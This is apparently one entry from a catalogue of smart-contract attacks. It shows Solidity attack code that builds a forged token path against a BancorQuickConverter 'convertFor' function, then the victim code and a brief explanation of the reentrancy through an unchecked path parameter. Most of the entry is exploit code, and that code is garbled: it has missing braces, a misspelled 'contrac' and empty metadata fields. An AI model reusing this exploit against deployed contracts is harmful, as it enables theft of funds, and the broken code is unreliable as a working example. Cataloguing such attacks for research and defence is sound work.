Attack 13ΒΆ

Contract Name


Contract Address


Transaction Count


Invovled Ethers

0 Ethers

Length of the Call Chain

1 external function

Victim Function


Attack Mechanisim

Attack code:

contract Attack is IERC20Token{
    BancorQuickConverter b = new BancorQuickConverter();
    constructor() payable {}
    IERC20Token[] _path

    function setPath() {
        _path[0] = Attack(this);
        _path[1] = Attack(this);
        _path[2] = Attack(this);

    function deposit() public {
        b.convertFor.value(10)(_path, 10, 0, this);

    function getvalue() returns (uint) {
        return this.balance;

contract IERC20Token is IEtherToken {}
contrac IEtherToken{}

Attacked code:

contract BancorQuickConverter {
    modifier validConversionPath() {
        require(_path.length > 2 && _path.length <= (1 + 2 * 10) && _path.length % 2 == 1);

    function convertFor(IERC20Token[] _path, uint256 _amount, uint256 _minReturn, address _for)
        returns (uint256)
        // if ETH is provided, ensure that the amount is identical to _amount and verify that the source token is an ether token
        IERC20Token fromToken = _path[0];
        require(msg.value == 0 || (_amount == msg.value && etherTokens[fromToken]));

        ISmartToken smartToken;
        IERC20Token toToken;
        ITokenConverter converter;
        uint256 pathLength = _path.length;

        if (msg.value > 0)

        for (uint256 i = 1; i < pathLength; i += 2) {
            smartToken = ISmartToken(_path[i]);
            toToken = _path[i + 1];
            converter = ITokenConverter(smartToken.owner());

            if (smartToken != fromToken)
                ensureAllowance(fromToken, converter, _amount);

            _amount = converter.change(fromToken, toToken, _amount, i == pathLength - 2 ? _minReturn : 1);
            fromToken = toToken;

        if (etherTokens[toToken])
            IEtherToken(toToken).withdrawTo(_for, _amount);
            assert(toToken.transfer(_for, _amount));

        return _amount;

In this case, the attacker can lauch reentrancy attack by calling IEtherToken(fromToken).deposit.value(msg.value)();. The parameter fromToken is not carefully checked and can be easily changed by visitors. Visitor can modify the value of _path by passing an arbitrary parameter. Since fromToken is assigned by _path, the value of fromToken is modified after _path.

Attack. The attacker call setPath function to specify the array _path, and call deposit to start attack.